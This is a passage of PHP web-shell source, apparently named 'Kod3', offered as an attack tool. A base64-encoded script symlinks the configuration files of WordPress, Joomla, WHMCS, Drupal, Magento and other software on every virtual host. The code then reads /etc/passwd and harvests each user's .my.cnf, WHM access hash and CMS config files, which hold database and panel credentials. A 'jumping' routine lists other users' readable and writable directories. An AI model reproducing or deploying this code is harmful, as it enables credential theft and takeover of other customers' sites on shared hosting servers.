dwL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvV1Avd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ByZXNzL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cDEzLXByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictd29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2Jsb2cvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93b3JkcHJlc3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ld3Mvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1uZXdzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ldy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLW5ldy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9nL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtYmxvZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtYmV0YS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9ncy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLWJsb2dzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvbWUvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1ob21lLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Byb3RhbC93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3Mtc2l0ZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYWluL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtbWFpbi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy90ZXN0L3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtdGVzdC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcmNhZGUvZnVuY3Rpb25zL2RiY2xhc3MucGhwJywkc2l0ZXNzLictaWJwcm9hcmNhZGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJjYWRlL2Z1bmN0aW9ucy9kYmNsYXNzLnBocCcsJHNpdGVzcy4nLWlicHJvYXJjYWRlLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2pvb21sYS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYTIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvcHJvdGFsL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9qb28vY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb28udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY21zL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLWNtcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXNpdGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbWFpbi9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYS1tYWluLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ld3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9uZXcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvbWUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtaG9tZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy92Yi9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmJ+Y29uZmlnLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiMy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIzfmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jYy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIxfmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9mb3J1bS9pbmNsdWRlcy9jbGFzc19jb3JlLnBocCcsJHNpdGVzcy4nLXZibHV0dGlufmNsYXNzX2NvcmUucGhwLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAxLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NjL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobTE1LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NlbnRyYWwvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tY2VudHJhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93aG0vd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0td2htY3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htL1dITUNTL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLVdITUNTLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobWMvV0hNL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htYy1XSE0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG1jcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0L2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcG9ydC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zZWN1cmUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1zdWN1cmUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1Y3VyZS13aG0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VjdXJlLXdobWNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NwYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWNwYW5lbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9wYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXBhbmVsLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3QvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VibWl0dGlja2V0LnBocCcsJHNpdGVzcy4nLXdobWNzMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY2xpZW50ZXMvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudHN1cHBvcnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRzdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5nLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYW5hZ2UvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tbWFuYWdlLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9teS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS1teS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbXlzaG9wL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLW15c2hvcC50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictemVuY2FydC50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvemVuY2FydC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXplbmNhcnQudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictc2hvcC1aQ3Nob3AudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc21mL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZjIudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi1mb3J1bS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW1zL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi1mb3J1bXMudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwbG9hZC9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdXAudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJ0aWNsZS9jb25maWcucGhwJywkc2l0ZXNzLictTndhaHkudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy11cDIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZl9nbG9iYWwucGhwJywkc2l0ZXNzLictNi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9pbmNsdWRlL2RiLnBocCcsJHNpdGVzcy4nLTcudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29ubmVjdC5waHAnLCRzaXRlc3MuJy1QSFAtRnVzaW9uLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL21rX2NvbmYucGhwJywkc2l0ZXNzLictOS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlcy9kZWZhdWx0L3NldHRpbmdzLnBocCcsJHNpdGVzcy4nLURydXBhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXIvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy0xbWVtYmVyLnR4dCcpIDsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmlsbGluZ3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5ncy50eHQnKSA7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0cy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1cHBvcnRzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3JlcXVpcmVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy1BTTRTUy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3N1cHBvcnRzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLXN1cHBvcnRzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VwcG9ydC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1zdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmcvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtYmlsbGluZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iaWxsaW5ncy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1iaWxsaW5ncy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob3N0L2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3QudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdHMvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdGluZy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmdzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RpbmdzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RiaWxsaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdGJpbGxzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RiaWxsLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FwcC9ldGMvbG9jYWwueG1sJywkc2l0ZXNzLictTWFnZW50by50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictT3BlbmNhcnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnL3NldHRpbmdzLmluYy5waHAnLCRzaXRlc3MuJy1QcmVzdGFzaG9wLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NvbmZpZy9rb25la3NpLnBocCcsJHNpdGVzcy4nLUxva29tZWRpYS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9sb2tvbWVkaWEvY29uZmlnL2tvbmVrc2kucGhwJywkc2l0ZXNzLictTG9rb21lZGlhLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NsY29uZmlnLnBocCcsJHNpdGVzcy4nLVNpdGVsb2NrLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FwcGxpY2F0aW9uL2NvbmZpZy9kYXRhYmFzZS5waHAnLCRzaXRlc3MuJy1FbGxpc2xhYi50eHQnKTsNCn0NCnByaW50ICJMb2NhdGlvbjogLi9cblxuIjs=";
704. $file = "Kod3_Configs/vhost.cin";
705. $handle = fopen($file ,"w+");
706. fwrite($handle ,base64_decode($vhost));
707. fclose($handle);
708. chmod($file, 0755);
709. if(exe("cd Kod3_Configs && ./vhost.cin")) {
710. echo "<center><a href='$link_config/Kod3_Configs'><font color=green>Done</font></a></center>";
711. } else {
712. echo "<center><a href='$link_config/Kod3_Configs/vhost.cin'><font color=green>Done</font></a></center>";
713. }
714.  
715. } else {
716. $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>SHIT !! CAN'T READ /ETC/PASSSWD- SHIT HAPPENS BE CLAM</font></pre>");
717. while($passwd = fgets($etc)) {
718. if($passwd == "" || !$etc) {
719. echo "<font color=red> SHIT !! CAN'T READ /ETC/PASSSWD- SHIT HAPPENS BE CLAM</font>";
720. } else {
721. preg_match_all('/(.*?):x:/', $passwd, $user_config);
722. foreach($user_config[1] as $user_idx) {
723. $user_config_dir = "/home/$user_idx/public_html/";
724. if(is_readable($user_config_dir)) {
725. $grab_config = array(
726. "/home/$user_idx/.my.cnf" => "cpanel",
727. "/home/$user_idx/.accesshash" => "WHM-accesshash",
728. "$user_config_dir/po-content/config.php" => "Popoji",
729. "$user_config_dir/vdo_config.php" => "Voodoo",
730. "$user_config_dir/bw-configs/config.ini" => "BosWeb",
731. "$user_config_dir/config/koneksi.php" => "Lokomedia",
732. "$user_config_dir/lokomedia/config/koneksi.php" => "Lokomedia",
733. "$user_config_dir/clientarea/configuration.php" => "WHMCS",
734. "$user_config_dir/whm/configuration.php" => "WHMCS",
735. "$user_config_dir/whmcs/configuration.php" => "WHMCS",
736. "$user_config_dir/forum/config.php" => "phpBB",
737. "$user_config_dir/sites/default/settings.php" => "Drupal",
738. "$user_config_dir/config/settings.inc.php" => "PrestaShop",
739. "$user_config_dir/app/etc/local.xml" => "Magento",
740. "$user_config_dir/joomla/configuration.php" => "Joomla",
741. "$user_config_dir/configuration.php" => "Joomla",
742. "$user_config_dir/wp/wp-config.php" => "WordPress",
743. "$user_config_dir/wordpress/wp-config.php" => "WordPress",
744. "$user_config_dir/wp-config.php" => "WordPress",
745. "$user_config_dir/admin/config.php" => "OpenCart",
746. "$user_config_dir/slconfig.php" => "Sitelok",
747. "$user_config_dir/application/config/database.php" => "Ellislab");
748. foreach($grab_config as $config => $nama_config) {
749. $ambil_config = file_get_contents($config);
750. if($ambil_config == '') {
751. } else {
752. $file_config = fopen("Kod3_Configs/$user_idx-$nama_config.txt","w");
753. fputs($file_config,$ambil_config);
754. }
755. }
756. }
757. }
758. }
759. }
760. echo "<center><a href='?dir=$dir/Kod3_Configs'><font color=green>Done</font></a></center>";
761. }
762. } elseif($_GET['do'] == 'jumping') {
763. $i = 0;
764. echo "<div class='margin: 5px auto;'>";
765. if(preg_match("/hsphere/", $dir)) {
766. $urls = explode("\r\n", $_POST['url']);
767. if(isset($_POST['jump'])) {
768. echo "<pre>";
769. foreach($urls as $url) {
770. $url = str_replace(array("http://","www."), "", strtolower($url));
771. $etc = "/etc/passwd";
772. $f = fopen($etc,"r");
773. while($gets = fgets($f)) {
774. $pecah = explode(":", $gets);
775. $user = $pecah[0];
776. $dir_user = "/hsphere/local/home/$user";
777. if(is_dir($dir_user) === true) {
778. $url_user = $dir_user."/".$url;
779. if(is_readable($url_user)) {
780. $i++;
781. $jrw = "[<font color=green>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
782. if(is_writable($url_user)) {
783. $jrw = "[<font color=green>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
784. }
785. echo $jrw."<br>";
786. }
787. }
788. }
789. }
790. if($i == 0) {
791. } else {
792. echo "<br>Total ada ".$i." Kamar di ".$ip;
793. }
794. echo "</pre>";
795. } else {
796. echo '<center>
797. <form method="post">
798. List Domains: <br>
799. <textarea name="url" style="width: 500px; height: 250px;">';
800. $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
801. while($getss = fgets($fp)) {
802. echo $getss;
803. }
804. echo '</textarea><br>
